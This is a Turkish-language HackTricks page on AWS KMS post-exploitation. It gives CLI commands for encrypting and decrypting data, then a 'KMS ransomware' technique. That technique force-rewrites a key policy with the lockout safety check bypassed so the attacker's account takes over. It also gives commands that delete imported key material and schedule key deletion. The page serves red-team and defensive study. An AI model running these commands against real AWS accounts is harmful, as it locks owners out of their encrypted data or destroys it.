AWS - KMS Post Exploitation

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

KMS

Daha fazla bilgi için kontrol edin:

AWS - KMS Enum

Bilgileri Şifrele/Şifre Çöz

fileb:// ve file:// AWS CLI komutlarında yerel dosyaların yolunu belirtmek için kullanılan URI şemalarıdır:

fileb://: Dosyayı ikili modda okur, genellikle metin dışı dosyalar için kullanılır.
file://: Dosyayı metin modunda okur, genellikle düz metin dosyaları, betikler veya özel kodlama gereksinimleri olmayan JSON için kullanılır.

Bir dosya içindeki verileri şifre çözmek istiyorsanız, dosyanın ikili verileri içermesi gerektiğini unutmayın, base64 kodlu veriler değil. (fileb://)

simetrik bir anahtar kullanarak

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

Asimetrik bir anahtar kullanma:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

KMS üzerinde ayrıcalıklı erişime sahip bir saldırgan, anahtarların KMS politikasını değiştirebilir ve kendi hesabına erişim verebilir, meşru hesaba verilen erişimi kaldırarak.

Böylece, meşru hesap kullanıcıları, bu anahtarlarla şifrelenmiş herhangi bir hizmetin bilgilerine erişemeyecek, bu da hesap üzerinde kolay ama etkili bir fidye yazılımı oluşturacaktır.

AWS yönetilen anahtarların bu saldırıdan etkilenmediğini unutmayın, yalnızca Müşteri yönetilen anahtarlar etkilenmektedir.

Ayrıca, --bypass-policy-lockout-safety-check parametresinin kullanılma gereğini unutmayın (bu seçeneğin web konsolunda olmaması, bu saldırının yalnızca CLI üzerinden mümkün olmasını sağlar).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Not edin ki, eğer bu politikayı değiştirir ve yalnızca bir dış hesaba erişim verirseniz, ardından bu dış hesaptan erişimi orijinal hesaba geri vermek için yeni bir politika ayarlamaya çalışırsanız, bunu yapamayacaksınız.

Genel KMS Fidye Yazılımı

Küresel KMS Fidye Yazılımı

Küresel KMS Fidye Yazılımı gerçekleştirmek için başka bir yol vardır, bu aşağıdaki adımları içerecektir:

Saldırgan tarafından içe aktarılan anahtar materyali ile yeni bir anahtar oluşturun
Eski verileri önceki sürümle şifrelenmiş olan yeni anahtarla yeniden şifreleyin.
KMS anahtarını silin
Artık yalnızca orijinal anahtar materyaline sahip olan saldırgan, şifrelenmiş verileri çözebilir

Anahtarları Yok Et

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

AWS'nin artık önceki eylemlerin bir çapraz hesap üzerinden gerçekleştirilmesini engellediğini unutmayın:

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - IAM Post Exploitation NextAWS - Lambda Post Exploitation

Last updated 3 days ago